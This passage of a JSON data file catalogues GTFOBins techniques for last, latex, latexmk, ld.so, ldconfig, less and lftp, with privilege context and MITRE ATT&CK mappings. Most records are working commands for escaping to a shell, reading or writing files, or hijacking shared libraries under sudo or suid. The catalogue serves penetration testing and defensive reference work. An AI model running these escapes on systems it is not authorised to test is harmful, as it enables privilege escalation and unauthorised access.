installation","aliases":["lastb"]},{"id":"gtfo:last:file-read:0:unprivileged","toolId":"gtfo:last","toolName":"last","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"last -a -f /path/to/input-file","description":"The output might be corrupted or incomplete if the file does not follow the expected database format.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/last/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["lastb"]},{"id":"gtfo:latex:file-read:0:sudo","toolId":"gtfo:latex","toolName":"latex","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"latex '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{/path/to/input-file}\\end{document}'\nstrings texput.dvi","description":"The read file will be part of the PDF output.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/latex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["xelatex"]},{"id":"gtfo:latex:file-read:0:suid","toolId":"gtfo:latex","toolName":"latex","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"latex '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{/path/to/input-file}\\end{document}'\nstrings texput.dvi","description":"The read file will be part of the PDF output.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/latex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["xelatex"]},{"id":"gtfo:latex:file-read:0:unprivileged","toolId":"gtfo:latex","toolName":"latex","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"latex '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{/path/to/input-file}\\end{document}'\nstrings texput.dvi","description":"The read file will be part of the PDF output.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/latex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["xelatex"]},{"id":"gtfo:latex:file-write:0:sudo","toolId":"gtfo:latex","toolName":"latex","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"latex '\\documentclass{article}\\newwrite\\tempfile\\begin{document}\\immediate\\openout\\tempfile=output-file.tex\\immediate\\write\\tempfile{DATA}\\immediate\\closeout\\tempfile\\end{document}'","description":"The file can only be written in the current directory, and the `.tex` extension is mandatory.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/latex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["xelatex"]},{"id":"gtfo:latex:file-write:0:suid","toolId":"gtfo:latex","toolName":"latex","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"latex '\\documentclass{article}\\newwrite\\tempfile\\begin{document}\\immediate\\openout\\tempfile=output-file.tex\\immediate\\write\\tempfile{DATA}\\immediate\\closeout\\tempfile\\end{document}'","description":"The file can only be written in the current directory, and the `.tex` extension is mandatory.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/latex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["xelatex"]},{"id":"gtfo:latex:file-write:0:unprivileged","toolId":"gtfo:latex","toolName":"latex","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"latex '\\documentclass{article}\\newwrite\\tempfile\\begin{document}\\immediate\\openout\\tempfile=output-file.tex\\immediate\\write\\tempfile{DATA}\\immediate\\closeout\\tempfile\\end{document}'","description":"The file can only be written in the current directory, and the `.tex` extension is mandatory.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/latex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["xelatex"]},{"id":"gtfo:latex:shell:0:sudo","toolId":"gtfo:latex","toolName":"latex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"latex --shell-escape '\\immediate\\write18{/bin/sh}'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/latex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["xelatex"]},{"id":"gtfo:latex:shell:0:suid","toolId":"gtfo:latex","toolName":"latex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"latex --shell-escape '\\immediate\\write18{/bin/sh}'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/latex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["xelatex"]},{"id":"gtfo:latex:shell:0:unprivileged","toolId":"gtfo:latex","toolName":"latex","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"latex --shell-escape '\\immediate\\write18{/bin/sh}'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/latex/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":["xelatex"]},{"id":"gtfo:latexmk:file-read:0:sudo","toolId":"gtfo:latexmk","toolName":"latexmk","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"echo '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{/path/to/input-file}\\end{document}' >/path/to/temp-file\nlatexmk -dvi /path/to/temp-file\nstrings temp-file.dvi","description":"The read file will be part of the output.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/latexmk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:latexmk:file-read:0:unprivileged","toolId":"gtfo:latexmk","toolName":"latexmk","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"echo '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{/path/to/input-file}\\end{document}' >/path/to/temp-file\nlatexmk -dvi /path/to/temp-file\nstrings temp-file.dvi","description":"The read file will be part of the output.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/latexmk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:latexmk:inherit:0:sudo","toolId":"gtfo:latexmk","toolName":"latexmk","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:perl"],"command":"latexmk -e '...'","description":"This allows to run Perl code (`...`).","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/latexmk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:latexmk:inherit:0:unprivileged","toolId":"gtfo:latexmk","toolName":"latexmk","name":"inherit ← perl","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:perl"],"command":"latexmk -e '...'","description":"This allows to run Perl code (`...`).","mitre":["T1105","T1005","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/latexmk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:latexmk:shell:0:sudo","toolId":"gtfo:latexmk","toolName":"latexmk","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"latexmk -pdf -pdflatex='/bin/sh #' /dev/null","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/latexmk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:latexmk:shell:0:unprivileged","toolId":"gtfo:latexmk","toolName":"latexmk","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"latexmk -pdf -pdflatex='/bin/sh #' /dev/null","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/latexmk/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ld.so:shell:0:sudo","toolId":"gtfo:ld.so","toolName":"ld.so","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"/path/to/ld.so /bin/sh","description":"The spawned process will be the loader, not the target executable, this might aid evasion. See <https://shyft.us/posts/20230526_linux_command_proxy.html> for more information.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ld.so/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ld.so:shell:0:suid","toolId":"gtfo:ld.so","toolName":"ld.so","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"/path/to/ld.so /bin/sh -p","description":"The spawned process will be the loader, not the target executable, this might aid evasion. See <https://shyft.us/posts/20230526_linux_command_proxy.html> for more information.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ld.so/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ld.so:shell:0:unprivileged","toolId":"gtfo:ld.so","toolName":"ld.so","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"/path/to/ld.so /bin/sh","description":"The spawned process will be the loader, not the target executable, this might aid evasion. See <https://shyft.us/posts/20230526_linux_command_proxy.html> for more information.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ld.so/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ldconfig:library-load:0:sudo","toolId":"gtfo:ldconfig","toolName":"ldconfig","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"echo /path/to/temp-dir/ >/path/to/temp-file\nldconfig -f /path/to/temp-file\nping","description":"This allows to override one or more shared libraries (e.g., `libpcap`) globally, then triggers the execution by running a program that uses it, e.g., `ping`. This is particularly useful if the target binary is SUID. Beware though that it is easy to end up with a broken target system.\n\nFirst identify the shared libraries used by the target program, for example:\n\n```\n$ ldd /bin/ping | grep libcap\n libcap.so.2 => /path/to/temp-dir/libcap.so.2 (0x00007f8417eef000)\n```\n\nThen create the shared library override, named `libcap.so.2`, and put in in `/path/to/temp-dir/`. The program might require some exported symbols from the library override, in that case make sure to add them (e.g., `void cap_get_flag() {}`).","mitre":["T1574"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ldconfig/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ldconfig:library-load:0:suid","toolId":"gtfo:ldconfig","toolName":"ldconfig","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Privilege Escalation"],"nativeCategory":["library-load"],"command":"echo /path/to/temp-dir/ >/path/to/temp-file\nldconfig -f /path/to/temp-file\nping","description":"This allows to override one or more shared libraries (e.g., `libpcap`) globally, then triggers the execution by running a program that uses it, e.g., `ping`. This is particularly useful if the target binary is SUID. Beware though that it is easy to end up with a broken target system.\n\nFirst identify the shared libraries used by the target program, for example:\n\n```\n$ ldd /bin/ping | grep libcap\n libcap.so.2 => /path/to/temp-dir/libcap.so.2 (0x00007f8417eef000)\n```\n\nThen create the shared library override, named `libcap.so.2`, and put in in `/path/to/temp-dir/`. The program might require some exported symbols from the library override, in that case make sure to add them (e.g., `void cap_get_flag() {}`).","mitre":["T1574"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ldconfig/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:ldconfig:library-load:0:unprivileged","toolId":"gtfo:ldconfig","toolName":"ldconfig","name":"library-load","source":"GTFOBins","platform":["Linux"],"capability":["Library Load"],"nativeCategory":["library-load"],"command":"echo /path/to/temp-dir/ >/path/to/temp-file\nldconfig -f /path/to/temp-file\nping","description":"This allows to override one or more shared libraries (e.g., `libpcap`) globally, then triggers the execution by running a program that uses it, e.g., `ping`. This is particularly useful if the target binary is SUID. Beware though that it is easy to end up with a broken target system.\n\nFirst identify the shared libraries used by the target program, for example:\n\n```\n$ ldd /bin/ping | grep libcap\n libcap.so.2 => /path/to/temp-dir/libcap.so.2 (0x00007f8417eef000)\n```\n\nThen create the shared library override, named `libcap.so.2`, and put in in `/path/to/temp-dir/`. The program might require some exported symbols from the library override, in that case make sure to add them (e.g., `void cap_get_flag() {}`).","mitre":["T1574"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ldconfig/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:command:0:unprivileged","toolId":"gtfo:less","toolName":"less","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"cp /path/to/command ~/.lessfilter\nless /etc/hosts","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:command:1:sudo","toolId":"gtfo:less","toolName":"less","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"LESSOPEN='/path/to/command # %s' less /etc/hosts","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:command:1:unprivileged","toolId":"gtfo:less","toolName":"less","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"LESSOPEN='/path/to/command # %s' less /etc/hosts","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:file-read:0:sudo","toolId":"gtfo:less","toolName":"less","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"less /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:file-read:0:suid","toolId":"gtfo:less","toolName":"less","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"less /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:file-read:0:unprivileged","toolId":"gtfo:less","toolName":"less","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"less /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:file-read:1:sudo","toolId":"gtfo:less","toolName":"less","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"less /etc/hosts\n:e /path/to/input-file","description":"This can be used to read another file, e.g., when invoked as a pager with some fixed content.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:file-read:1:suid","toolId":"gtfo:less","toolName":"less","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"less /etc/hosts\n:e /path/to/input-file","description":"This can be used to read another file, e.g., when invoked as a pager with some fixed content.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:file-read:1:unprivileged","toolId":"gtfo:less","toolName":"less","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"less /etc/hosts\n:e /path/to/input-file","description":"This can be used to read another file, e.g., when invoked as a pager with some fixed content.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:file-read:2:sudo","toolId":"gtfo:less","toolName":"less","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"LESSOPEN='echo /path/to/input-file # %s' less /etc/hosts","description":"This can be used to read another file.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:file-read:2:unprivileged","toolId":"gtfo:less","toolName":"less","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"LESSOPEN='echo /path/to/input-file # %s' less /etc/hosts","description":"This can be used to read another file.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:file-write:0:sudo","toolId":"gtfo:less","toolName":"less","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | less\ns/path/to/output-file\nq","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:file-write:0:suid","toolId":"gtfo:less","toolName":"less","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA | less\ns/path/to/output-file\nq","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:file-write:0:unprivileged","toolId":"gtfo:less","toolName":"less","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA | less\ns/path/to/output-file\nq","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:inherit:0:sudo","toolId":"gtfo:less","toolName":"less","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"less /etc/hosts\nv","mitre":["T1005","T1565","T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:inherit:0:suid","toolId":"gtfo:less","toolName":"less","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:vi"],"command":"less /etc/hosts\nv","mitre":["T1005","T1565","T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:inherit:0:unprivileged","toolId":"gtfo:less","toolName":"less","name":"inherit ← vi","source":"GTFOBins","platform":["Linux"],"capability":["File Read","File Write","Execution"],"nativeCategory":["inherit","from:vi"],"command":"less /etc/hosts\nv","mitre":["T1005","T1565","T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:shell:0:sudo","toolId":"gtfo:less","toolName":"less","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"less /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:shell:0:suid","toolId":"gtfo:less","toolName":"less","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"less /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:shell:0:unprivileged","toolId":"gtfo:less","toolName":"less","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"less /etc/hosts\n!/bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:shell:1:sudo","toolId":"gtfo:less","toolName":"less","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"LESSOPEN=\"/bin/sh -s 1>&0 2>&0 # %s\" less /etc/hosts\nreset","description":"The optional `reset` command is needed to receive the echo back of the typed keystrokes.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:shell:1:unprivileged","toolId":"gtfo:less","toolName":"less","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"LESSOPEN=\"/bin/sh -s 1>&0 2>&0 # %s\" less /etc/hosts\nreset","description":"The optional `reset` command is needed to receive the echo back of the typed keystrokes.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:shell:2:sudo","toolId":"gtfo:less","toolName":"less","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"VISUAL='/bin/sh -s --' less /etc/hosts\nv","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:less:shell:2:unprivileged","toolId":"gtfo:less","toolName":"less","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"VISUAL='/bin/sh -s --' less /etc/hosts\nv","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/less/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lftp:shell:0:sudo","toolId":"gtfo:lftp","toolName":"lftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"lftp -c '!/bin/sh'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/lftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lftp:shell:0:suid","toolId":"gtfo:lftp","toolName":"lftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"lftp -c '!/bin/sh'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/lftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:lftp:shell:0:unprivileged","toolId":"gtfo:lftp","toolName":"lftp","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"lftp -c '!/bin/sh'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/lftp/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream 